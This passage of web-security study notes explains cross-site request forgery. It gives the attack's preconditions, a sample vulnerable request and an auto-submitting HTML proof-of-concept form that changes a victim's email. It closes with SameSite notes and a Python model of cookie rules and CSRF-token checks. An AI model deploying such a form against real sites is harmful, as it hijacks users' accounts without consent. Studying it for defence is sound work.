tricks a user into performing actions on a site where they are authenticated, without their consent.
Example:
https://vulnerable-website.com/email/change?email=pwned@evil.user.net
Three conditions must hold:
A relevant action. The attacker aims to induce an action within the application, like modifying permissions or changing a user's password.
Cookie-based session handling. Performing the action involves issuing one or more HTTP requests, and the application uses session cookies to identify the user who has made the requests. There is no other mechanism in place for tracking sessions or validating user requests.
No unpredictable request parameters. Requests performing the action lack parameters that attackers can't guess. For instance, changing a password isn't vulnerable if the attacker needs the current password.
e.g. this request to change an email address meets all three conditions:
POST /email/change HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: session=yvthwsztyeQkAPzeQ5gHgTvlyxHfsAfE

email=wiener@normal-user.com
A CSRF PoC for the above request would look like this:
<html>
  <body>
    <!-- Auto-submitting form: the victim's browser attaches its own session cookie -->
    <form action="https://vulnerable-website.com/email/change" method="POST">
      <input type="hidden" name="email" value="pwned@evil-user.net" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
Now, if the victim visits this page while logged in to their account on the vulnerable site, the browser automatically attaches the existing session cookie to the cross-site request, and the email address is changed.
Lab: CSRF vulnerability with no defenses
SameSite
A cookie attribute that restricts whether the cookie is sent with cross-site requests.
Strict → best. Restricts everything.
Lax → bad. Can be bypassed.
None → worst. Does nothing.
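To tie the PoC and the SameSite notes together, here is an added example (not PortSwigger's code) that models, in simplified form, the browser's SameSite decision for the auto-submitted POST above and for a plain GET link, and shows the server-side synchronizer-token check that breaks the third condition (no unpredictable parameter). Site names, the session id and the token store are constructed for illustration.

```python
import hmac
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class Request:
    method: str          # "GET" or "POST"
    initiator_site: str  # site of the page that caused the request (constructed value)
    target_site: str     # site the request is sent to (constructed value)
    top_level: bool      # top-level navigation (form submit, link) vs fetch/subresource


def cookie_is_sent(samesite: str, req: Request) -> bool:
    """Simplified SameSite rule: same-site requests always carry the cookie;
    Strict never sends it cross-site; Lax sends it only on top-level GET
    navigations; None always sends it (browsers also require Secure)."""
    if req.initiator_site == req.target_site:
        return True
    if samesite == "Strict":
        return False
    if samesite == "Lax":
        return req.method == "GET" and req.top_level
    return True  # SameSite=None: no restriction


# Server side: a per-session CSRF token (synchronizer token pattern).
def issue_csrf_token(session_store: dict, session_id: str) -> str:
    """Generate an unguessable token and bind it to the session (in-memory store assumed)."""
    token = secrets.token_urlsafe(32)
    session_store[session_id] = token
    return token


def email_change_allowed(session_store: dict, cookies: dict, form: dict) -> bool:
    """Accept the /email/change POST only if the form carries the token bound to
    the session cookie. An attacker's page cannot read that token across origins,
    so the auto-submitted form from the PoC fails this check."""
    session_id = cookies.get("session")
    expected = session_store.get(session_id) if session_id else None
    supplied = form.get("csrf")
    if not expected or not supplied:
        return False
    # Constant-time comparison avoids leaking the token through timing differences.
    return hmac.compare_digest(expected.encode(), supplied.encode())
```

With SameSite=Lax the cross-site POST from the PoC carries no cookie, but a cross-site top-level GET (like the example URL earlier on the page) still does, which is why a state-changing GET endpoint undermines Lax.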